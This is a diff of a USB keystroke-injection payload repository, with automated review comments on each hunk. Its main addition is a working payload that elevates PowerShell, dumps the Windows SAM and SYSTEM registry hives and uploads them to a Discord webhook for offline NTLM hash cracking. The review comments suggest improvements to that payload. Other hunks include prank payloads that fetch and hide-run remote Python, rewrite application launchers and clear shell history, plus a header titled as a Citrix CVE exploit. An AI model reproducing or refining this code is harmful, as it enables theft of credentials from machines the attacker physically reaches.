@ -0,0 +1,28 @@
# Exfiltrate NTLM Hash - Windows ✅
A script used to exfiltrate the NTLM hash on a Windows machine.
## Description
A script used to capture and exfiltrate the NTLM hash of a Windows machine. It utilizes PowerShell to retrieve the SAM and SYSTEM files, then sends them to a Discord webhook. These files can than be used to extract the NTLM hash of all users.
### Settings
* Set the Discord webhook URL
* Ensure the webhook permissions are configured
## Credits
<h2 align="center"> Luu176 </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/luu176">
<img src="https://avatars.githubusercontent.com/u/112649910?v=4?raw=true" width="48" height="48" />
</a>
<br>Github
</td>
</tr>
</table>
</div>
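Review bot: "These files can than be used to extract the NTLM hash" should read "can then be used". The Settings list says to set the Discord webhook URL but not where; name the `DEFINE #DISCORD_WEBHOOK_URL` line in payload.txt. The title and first sentence say the script exfiltrates "the NTLM hash", whereas the Description correctly says it retrieves the SAM and SYSTEM files and sends them to the webhook; align the wording so a reader knows exactly what leaves the machine.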

View File

@ -0,0 +1,34 @@
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
END_EXTENSION
DEFINE #DISCORD_WEBHOOK_URL DISCORD_WEBHOOK_URL_HERE
GUI d
DELAY 1000
GUI r
DELAY 1000
STRINGLN powershell Start-Process powershell -Verb runAs
DELAY 3000
LEFTARROW
ENTER
DELAY 3000
STRINGLN C:\Windows\System32\reg save HKLM\SAM sam /y; C:\Windows\System32\reg save HKLM\SYSTEM system /y; Add-Type -AssemblyName "System.Net.Http"; $webhookUrl = "#DISCORD_WEBHOOK_URL"; $client = New-Object System.Net.Http.HttpClient; $fileStream1 = [System.IO.File]::OpenRead("sam"); $fileContent1 = New-Object System.Net.Http.StreamContent($fileStream1); $content1 = New-Object System.Net.Http.MultipartFormDataContent; $content1.Add($fileContent1, "file", "sam"); $client.PostAsync($webhookUrl, $content1).Result; $fileStream1.Close(); $fileStream2 = [System.IO.File]::OpenRead("system"); $fileContent2 = New-Object System.Net.Http.StreamContent($fileStream2); $content2 = New-Object System.Net.Http.MultipartFormDataContent; $content2.Add($fileContent2, "file", "system"); $client.PostAsync($webhookUrl, $content2).Result; $fileStream2.Close()
DELAY 500
GUI d
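Review bot: `DEFINE #DISCORD_WEBHOOK_URL DISCORD_WEBHOOK_URL_HERE` is the only value a user must change, and the README hunk does not mention it; add a `REM REQUIRED` comment above it as the other payloads do. In the long `STRINGLN`, each `$client.PostAsync($webhookUrl, $content).Result` discards the HTTP response, so a rejected upload and a successful one look the same to the script; at minimum document that. From a defender's reading of the same line, the artifacts are two `reg.exe save HKLM\SAM` / `HKLM\SYSTEM` process creations and two files literally named `sam` and `system` left in the working directory of the elevated session, which is worth stating in the README's description. As in the sibling payloads, `$_OS` from `PASSIVE_WINDOWS_DETECT` is never tested after `END_EXTENSION`.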

View File

@ -1,13 +1,14 @@
REM #############################################################################################
REM # #
REM # Title : Auto-Check Cisco IOS XE Backdoor based on CVE-2023-20198 and CVE-2023-20273 #
REM # Author : Aleff #
REM # Version : 1.0 #
REM # Category : incident-response #
REM # Target : Cisco IOS XE #
REM # #
REM #############################################################################################
REM_BLOCK
#############################################################################################
# #
# Title : Auto-Check Cisco IOS XE Backdoor based on CVE-2023-20198 and CVE-2023-20273 #
# Author : Aleff #
# Version : 1.0 #
# Category : incident-response #
# Target : Cisco IOS XE #
# #
#############################################################################################
END_REM
REM Set the script name, the default name is auto-check.sh but you can change it here since is used the DuckyScript variable #SCRIPT-NAME.
DEFINE #SCRIPT-NAME auto-check.sh
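Review bot: The comment `REM Set the script name, the default name is auto-check.sh but you can change it here since is used the DuckyScript variable #SCRIPT-NAME.` is ungrammatical; suggest "since the DuckyScript constant #SCRIPT-NAME is used wherever the script is referenced". The header conversion to `REM_BLOCK` itself is fine.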
@ -75,17 +76,17 @@ STRINGLN
done' > #PATH-TO-SCRIPT#SCRIPT-NAME
END_STRINGLN
REM To avoid some bad DELAY I decided to use only one command row
REM Old script
REM STRINGLN sudo chmod +x #SCRIPT-NAME
REM DELAY 500
REM STRINGLN #SUDO-PSWD
REM DELAY 3000
REM STRINGLN sh #PATH-TO-SCRIPT#SCRIPT-NAME $
REM STRINGLN exit
REM_BLOCK
Old script:
STRINGLN sudo chmod +x #SCRIPT-NAME
DELAY 500
STRINGLN #SUDO-PSWD
DELAY 3000
STRINGLN sh #PATH-TO-SCRIPT#SCRIPT-NAME $
STRINGLN exit
END_REM
REM Optimized script
STRINGLN sudo chmod +x #SCRIPT-NAME; sh #PATH-TO-SCRIPT#SCRIPT-NAME $; exit
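Review bot: The optimized one-liner `sudo chmod +x #SCRIPT-NAME; sh #PATH-TO-SCRIPT#SCRIPT-NAME $; exit` drops the `STRINGLN #SUDO-PSWD` step that the old sequence typed after `DELAY 500`; if sudo prompts for a password, the whole chain stalls at that prompt unless the password is typed later outside this hunk. The `chmod +x` is applied to `#SCRIPT-NAME` (relative to the current directory) while `sh` runs `#PATH-TO-SCRIPT#SCRIPT-NAME`, so the two refer to different files unless `#PATH-TO-SCRIPT` is empty; and because the script is invoked through `sh`, the execute bit, and therefore the `sudo`, is not needed for that step at all. Keeping the old sequence in a `REM_BLOCK` for reference is fine.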

View File

@ -1,34 +1,79 @@
REM #######################################################################################################################
REM # |
REM # Title : Defend yourself against CVE-2023-36884 Office and Windows HTML Remote Code Execution Vulnerability |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Incident Response |
REM # Target : Windows 10/11 |
REM # |
REM #######################################################################################################################
REM_BLOCK
#######################################################################################################################
# #
# Title : Defend yourself against CVE-2023-36884 Office and Windows HTML Remote Code Execution Vulnerability #
# Author : Aleff #
# Version : 1.0 #
# Category : Incident Response #
# Target : Windows 10/11 #
# #
#######################################################################################################################
REM PlugAndPlay <3
PlugAndPlay <3
REM Requirements:
REM - ExecutionPolicy Bypass
Requirements:
- ExecutionPolicy Bypass
REM Impact: Remote Code Execution
REM Max Severity: Important
Impact: Remote Code Execution
Max Severity: Important
REM Mitigation:
Mitigation:
REM - Customers who use Microsoft Defender for Office are protected from attachments that attempt to exploit this vulnerability.
- Customers who use Microsoft Defender for Office are protected from attachments that attempt to exploit this vulnerability.
REM - The registry key FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION is located in the Main folder under the Internet Explorer settings, within the path HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\FeatureControl. This registry key is used to mitigate the vulnerability known as "Office and Windows HTML Remote Code Execution Vulnerability" (CVE-2023-36884).
- The registry key FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION is located in the Main folder under the Internet Explorer settings, within the path HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\FeatureControl. This registry key is used to mitigate the vulnerability known as "Office and Windows HTML Remote Code Execution Vulnerability" (CVE-2023-36884).
REM The CVE-2023-36884 vulnerability allows remote code execution through the processing of HTML files by Office and Windows applications. Creating this registry key and adding specific application values, such as REG_DWORD with data 1, helps block cross-protocol file navigation to mitigate the exploitation of this vulnerability.
The CVE-2023-36884 vulnerability allows remote code execution through the processing of HTML files by Office and Windows applications. Creating this registry key and adding specific application values, such as REG_DWORD with data 1, helps block cross-protocol file navigation to mitigate the exploitation of this vulnerability.
REM It is recommended to implement these protective measures to prevent potential attacks that could exploit the vulnerability and compromise the security of Office and Windows systems. It is important to understand the implications of modifying the registry and carefully evaluate the impact on the regular functionality of the involved applications.
It is recommended to implement these protective measures to prevent potential attacks that could exploit the vulnerability and compromise the security of Office and Windows systems. It is important to understand the implications of modifying the registry and carefully evaluate the impact on the regular functionality of the involved applications.
REM Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36884
Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36884
END_REM
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
DELAY 1000
GUI x
DELAY 500
STRING a
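Review bot: The REM_BLOCK says the `FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION` key "is located in the Main folder", but the path it quotes, `HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\FeatureControl`, has no `Main` component; one of the two is wrong, so verify against the linked MSRC page and make the comment match the registry path the payload actually writes. The three REM'd sentences are also repeated verbatim from the advisory; a one-line summary plus the Source link would read better than the duplicated paragraphs.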

View File

@ -1,25 +1,27 @@
REM ########################################################
REM # |
REM # Title : Defend Yourself From CVE-2023-23397 |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Incident-Response |
REM # Target : Windows 10/11 |
REM # |
REM ########################################################
REM_BLOCK
########################################################
# #
# Title : Defend Yourself From CVE-2023-23397 #
# Author : Aleff #
# Version : 1.0 #
# Category : Incident-Response #
# Target : Windows 10/11 #
# #
########################################################
REM PlugAndPlay <3
PlugAndPlay <3
REM Requirements:
REM - ExecutionPolicy Bypass
REM - PayloadStudio 1.3.1
Requirements:
- ExecutionPolicy Bypass
- PayloadStudio 1.3.1
REM Impacted Products:
REM - All supported versions of Microsoft Outlook for Windows are affected. Other versions of Microsoft Outlook such as Android, iOS, Mac, as well as Outlook on the web and other M365 services are not affected.
Impacted Products:
- All supported versions of Microsoft Outlook for Windows are affected. Other versions of Microsoft Outlook such as Android, iOS, Mac, as well as Outlook on the web and other M365 services are not affected.
REM Mitigation:
REM - Block TCP 445/SMB outbound from your network by using a perimeter firewall, a local firewall, and via your VPN settings. This will prevent the sending of NTLM authentication messages to remote file shares.
REM Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23397
Mitigation:
- Block TCP 445/SMB outbound from your network by using a perimeter firewall, a local firewall, and via your VPN settings. This will prevent the sending of NTLM authentication messages to remote file shares.
Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23397
END_REM
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1

View File

@ -1,12 +1,14 @@
REM ################################################################################
REM # #
REM # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
REM # Author : Aleff #
REM # Version : 1.0 #
REM # Category : incident-response #
REM # Target : Citrix NetScaler ADV; NetScaler Gateway #
REM # #
REM ################################################################################
REM_BLOCK
################################################################################
# #
# Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
# Author : Aleff #
# Version : 1.0 #
# Category : incident-response #
# Target : Citrix NetScaler ADV; NetScaler Gateway #
# #
################################################################################
END_REM
REM Define here your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
DEFINE #HOSTNAME example
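Review bot: `Target : Citrix NetScaler ADV; NetScaler Gateway` carries the old typo into the new block; the product is NetScaler ADC, as the Title line itself says. The Category is `incident-response` while the Title says "Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966"; if the payload is a check for the issue rather than an exploit, retitle it accordingly so the header does not misdescribe it.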

View File

@ -1,39 +1,79 @@
REM_BLOCK
####################################################
# #
# Title : Alien Message From Computer #
# Author : Aleff #
# Version : 1.0 #
# Category : Prank #
# Target : Windows 10/11 #
# #
####################################################
REM ####################################################
REM # |
REM # Title : Alien Message From Computer |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : Windows 10/11 |
REM # |
REM ####################################################
Plug-And-Play <3
Requirements:
- Internet Connection
- ExecutionPolicy Bypass
- Python
END_REM
REM Plug-And-Play <3
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM Requirements:
REM - Internet Connection
REM - ExecutionPolicy Bypass
REM - Python
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 500
STRING powershell
ENTER
STRINGLN powershell
DELAY 1500
REM Create the file
STRING New-Item -Path ".\script.py" -ItemType "file" -Force;
STRING New-Item -Path ".\script.py" -ItemType "file" -Force;
REM Write the code into the file
STRING Set-Content -Path ".\script.py" -Value "import os; from time import sleep; os.system('pip install pyttsx3'); import pyttsx3; sleep(60); alien_message = 'Greetings to the inhabitants of planet Earth. I am an alien from a distant planet named Hak5 and I have taken control of this computer to communicate with you. I want to announce to you that in exactly one year\'s time our invasion fleet will arrive on your planet because we have heard that you make very good fries. Resistance is useless. Your only option is to give us all the fries you have and to produce as many as possible to satiate us. Your planet will become a potato chip colony and you will produce forever. Get ready, earthlings. Our hunger is near.'; motore = pyttsx3.init(); voce_alienea = motore.getProperty('voices')[1]; motore.setProperty('voice', voce_alienea.id); motore.setProperty('pitch', 70); motore.say(alien_message); motore.runAndWait();"
ENTER
STRINGLN Set-Content -Path ".\script.py" -Value "import os; from time import sleep; os.system('pip install pyttsx3'); import pyttsx3; sleep(60); alien_message = 'Greetings to the inhabitants of planet Earth. I am an alien from a distant planet named Hak5 and I have taken control of this computer to communicate with you. I want to announce to you that in exactly one year\'s time our invasion fleet will arrive on your planet because we have heard that you make very good fries. Resistance is useless. Your only option is to give us all the fries you have and to produce as many as possible to satiate us. Your planet will become a potato chip colony and you will produce forever. Get ready, earthlings. Our hunger is near.'; motore = pyttsx3.init(); voce_alienea = motore.getProperty('voices')[1]; motore.setProperty('voice', voce_alienea.id); motore.setProperty('pitch', 70); motore.say(alien_message); motore.runAndWait();"
DELAY 1000
REM Execute the Python script
STRING Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
ENTER
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
REM Close the PowerShell
DELAY 1000
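Review bot: In the Python one-liner written by `Set-Content`, `motore.getProperty('voices')[1]` indexes the second installed voice and raises IndexError on a host with a single voice; pyttsx3's documented engine properties are `rate`, `volume`, `voice` and `voices`, so `setProperty('pitch', 70)` is not portable across drivers either. Guard the index and drop or document the pitch call. Style: `STRING New-Item -Path ".\script.py" -ItemType "file" -Force;` without ENTER followed by `STRINGLN Set-Content ...` appears intended to type both as one command line; a short REM saying so would stop someone "fixing" it into two lines. The `STRING powershell` / `ENTER` to `STRINGLN powershell` folds are fine.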

View File

@ -1,36 +1,72 @@
REM ######################################################
REM # |
REM # Title : Change Wallpaper With Screenshot |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : Windows 10-11 |
REM # |
REM ######################################################
REM Requirements:
REM - Internet Connection
REM - ExecutionPolicy Bypass
REM - Python
REM_BLOCK
######################################################
# #
# Title : Change Wallpaper With Screenshot #
# Author : Aleff #
# Version : 1.0 #
# Category : Prank #
# Target : Windows 10-11 #
# #
######################################################
Requirements:
- Internet Connection
- ExecutionPolicy Bypass
- Python
END_REM
REM REQUIRED - Set your Python script link
DEFINE SCRIPT-PY-LINK example.com
DEFINE #SCRIPT-PY-LINK example.com
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
DELAY 1000
GUI r
DELAY 1000
STRING powershell
ENTER
STRINGLN powershell
DELAY 2000
STRING Invoke-WebRequest -Uri "
STRING SCRIPT-PY-LINK
STRING " -OutFile "script.py"
ENTER
STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"
DELAY 2000
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
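Review bot: Requirements list `ExecutionPolicy Bypass`, but the payload only types interactive cmdlets (`Invoke-WebRequest`, `Start-Process`) into a plain `powershell` session, and execution policy restricts script files rather than commands entered at the prompt; either drop the requirement or, if the downloaded `script.py` depends on it, say so. The `DELAY 2000` after `STRINGLN Invoke-WebRequest ...` is a fixed wait on a network download; the console buffers the next `STRINGLN` until the cmdlet returns, so the delay is harmless but is not what makes the sequence work, and a comment to that effect would help maintainers.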

View File

@ -1,39 +1,58 @@
REM ###########################################
REM # |
REM # Title : Change Desktop Wallpaper |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : Linux (KDE based) |
REM # |
REM ###########################################
REM_BLOCK
###########################################
# #
# Title : Change Desktop Wallpaper #
# Author : Aleff #
# Version : 1.1 #
# Category : Prank #
# Target : Linux (KDE based) #
# #
###########################################
REM Requirements:
REM - Internet Connection
Requirements:
- Internet Connection
END_REM
REM Replace 'example.com/IMAGE_NAME' with your image link
DEFINE #IMAGE_LINK example.com/IMAGE_NAME
REM Replace example.jpg with the image path, for example /home/USERNAME/example.jpg
DEFINE #IMAGE_PATH="file://example.jpg"
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
DELAY 1000
CTRL-ALT t
DELAY 2000
REM Replace 'example.com/IMAGE_NAME' with your image link
DEFINE IMAGE_LINK example.com/IMAGE_NAME
STRING wget
STRING IMAGE_LINK
ENTER
REM Replace example.jpg with the image path, for example /home/USERNAME/example.jpg
DEFINE IMAGE_PATH="file://example.jpg"
STRINGLN wget #IMAGE_LINK
REM It depends by the Internet Connection
DELAY 2000
STRING qdbus org.kde.plasmashell /PlasmaShell org.kde.PlasmaShell.evaluateScript 'var allDesktops = desktops();for (i=0;i<allDesktops.length;i++) {d = allDesktops[i]; d.wallpaperPlugin = "org.kde.image";d.currentConfigGroup = Array("Wallpaper", "org.kde.image", "General");d.writeConfig("Image", "
STRING IMAGE_PATH
STRING ")}'
ENTER
DELAY 1000
STRING rm -rf
STRING IMAGE_PATH
STRING ;history -c; exit;
ENTER
STRINGLN qdbus org.kde.plasmashell /PlasmaShell org.kde.PlasmaShell.evaluateScript 'var allDesktops = desktops();for (i=0;i<allDesktops.length;i++) {d = allDesktops[i]; d.wallpaperPlugin = "org.kde.image";d.currentConfigGroup = Array("Wallpaper", "org.kde.image", "General");d.writeConfig("Image", "#IMAGE_PATH")}'; rm -rf #IMAGE_PATH;history -c; exit;
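Review bot: `DEFINE #IMAGE_PATH="file://example.jpg"` keeps the `=` and quotes from the old line; DuckyScript `DEFINE` takes the name and the value separated by whitespace, so as written the constant's name is the whole token. More importantly, the final `STRINGLN` runs `rm -rf #IMAGE_PATH` on a `file://` URI, which is not a filesystem path, and `wget #IMAGE_LINK` saves the download under the URL's basename (`IMAGE_NAME`) in the current directory rather than at `example.jpg`; the `writeConfig("Image", "#IMAGE_PATH")` and the `rm` need to refer to the file actually written (for example `wget -O` to a known path, with the `file://` prefix applied only in the qdbus argument). `rm -rf` on a single file should also be plain `rm`. The header bumps Version to 1.1 while the other payloads in this diff stay at 1.0; fine if intentional.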

View File

@ -1,46 +1,65 @@
REM #######################################################
REM # |
REM # Title : Change The App That Will Be Runned |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : GNU/Linux (Debian based tested) |
REM # |
REM #######################################################
REM Requirements:
REM - sudo permissions
REM_BLOCK
#######################################################
# #
# Title : Change The App That Will Be Runned #
# Author : Aleff #
# Version : 1.0 #
# Category : Prank #
# Target : GNU/Linux (Debian based tested) #
# #
#######################################################
Requirements:
- sudo permissions
END_REM
REM You must know the original desktop name file, if you don't know it you can rich this information download the app on you system and going to /usr/share/applications/ searching this one app, i.e. the desktop file name of Signal application is signal-desktop.desktop, so in this case you should put signal-desktop.desktop
DEFINE ORIGINAL_DESKTOP_FILE_NAME_1 example
DEFINE ORIGINAL_DESKTOP_EXEC_COMMAND_1 example
DEFINE ORIGINAL_DESKTOP_FILE_NAME_2 example
DEFINE ORIGINAL_DESKTOP_EXEC_COMMAND_2 example
DEFINE #ORIGINAL_DESKTOP_FILE_NAME_1 example
DEFINE #ORIGINAL_DESKTOP_EXEC_COMMAND_1 example
DEFINE #ORIGINAL_DESKTOP_FILE_NAME_2 example
DEFINE #ORIGINAL_DESKTOP_EXEC_COMMAND_2 example
REM sudo permissions needed
DEFINE SUDO example
DEFINE #SUDO example
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
REM Open a shell
DELAY 2000
CTRL-ALT t
DELAY 1000
STRING sudo sed -i '/^Exec=/s/.*/
STRING ORIGINAL_DESKTOP_EXEC_COMMAND_2
STRING /'
STRINGLN ORIGINAL_DESKTOP_FILE_NAME_1
STRINGLN sudo sed -i '/^Exec=/s/.*/ #ORIGINAL_DESKTOP_EXEC_COMMAND_2 /' #ORIGINAL_DESKTOP_FILE_NAME_1
DELAY 500
STRING SUDO
ENTER
STRINGLN #SUDO
DELAY 4000
STRING sudo sed -i '/^Exec=/s/.*/
STRING ORIGINAL_DESKTOP_EXEC_COMMAND_1
STRING /'
STRINGLN ORIGINAL_DESKTOP_FILE_NAME_2
STRINGLN sudo sed -i '/^Exec=/s/.*/#ORIGINAL_DESKTOP_EXEC_COMMAND_1/' #ORIGINAL_DESKTOP_FILE_NAME_2
DELAY 1000
ALT f4
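Review bot: The two `sed` commands are inconsistent: `STRINGLN sudo sed -i '/^Exec=/s/.*/ #ORIGINAL_DESKTOP_EXEC_COMMAND_2 /' #ORIGINAL_DESKTOP_FILE_NAME_1` pads the replacement with spaces while the second, `s/.*/#ORIGINAL_DESKTOP_EXEC_COMMAND_1/`, does not, so the first writes a leading space into the file. In both, `s/.*/COMMAND/` replaces the entire `Exec=...` line, so the `Exec=` key is lost unless the DEFINE value itself begins with `Exec=`; use `s/^Exec=.*/Exec=COMMAND/`, and a different delimiter such as `s|...|...|` if the command contains slashes, which `sed` would otherwise read as delimiters. The comment says the desktop files live in `/usr/share/applications/`, but the command passes the bare file name, so it only works if the shell happens to open there. The same comment's "you can rich this information download the app on you system" should read "you can find this information by installing the app on your system and looking in /usr/share/applications/".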

View File

@ -1,27 +1,68 @@
REM ####################################################
REM # |
REM # Title : Continuos Print In Terminal |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : Windows 10/11 |
REM # |
REM ####################################################
REM_BLOCK
####################################################
# #
# Title : Continuos Print In Terminal #
# Author : Aleff #
# Version : 1.0 #
# Category : Prank #
# Target : Windows 10/11 #
# #
####################################################
Plug And Play <3
REM Plug And Play <3
Requirements:
- Internet Connection
- ExecutionPolicy Bypass
- Python
END_REM
REM Requirements:
REM - Internet Connection
REM - ExecutionPolicy Bypass
REM - Python
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
DELAY 1000
GUI r
DELAY 500
STRING powershell
ENTER
STRINGLN powershell
DELAY 2000
STRINGLN (New-Object -ComObject WScript.Shell).SendKeys("{F11}")
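Review bot: The new header keeps the title typo `Continuos Print In Terminal` (should be "Continuous"); since the block is being rewritten anyway, fix it here. `REM Plug And Play <3` survives as a bare REM line while `Plug And Play <3` also appears inside the new REM_BLOCK, so the note is now duplicated; keep one copy.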

View File

@ -1,36 +1,73 @@
REM ############################################
REM # |
REM # Title : Full-Screen Banner Joke |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : Windows 10-11 |
REM # |
REM ############################################
REM_BLOCK
############################################
# #
# Title : Full-Screen Banner Joke #
# Author : Aleff #
# Version : 1.0 #
# Category : Prank #
# Target : Windows 10-11 #
# #
############################################
REM Requirements:
REM - Internet Connection
REM - Python installed
REM - ExecutionPolicy Bypass
Requirements:
- Internet Connection
- Python installed
- ExecutionPolicy Bypass
END_REM
REM REQUIRED - Set your Python script link
DEFINE SCRIPT-PY-LINK example.com
DEFINE #SCRIPT-PY-LINK example.com
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
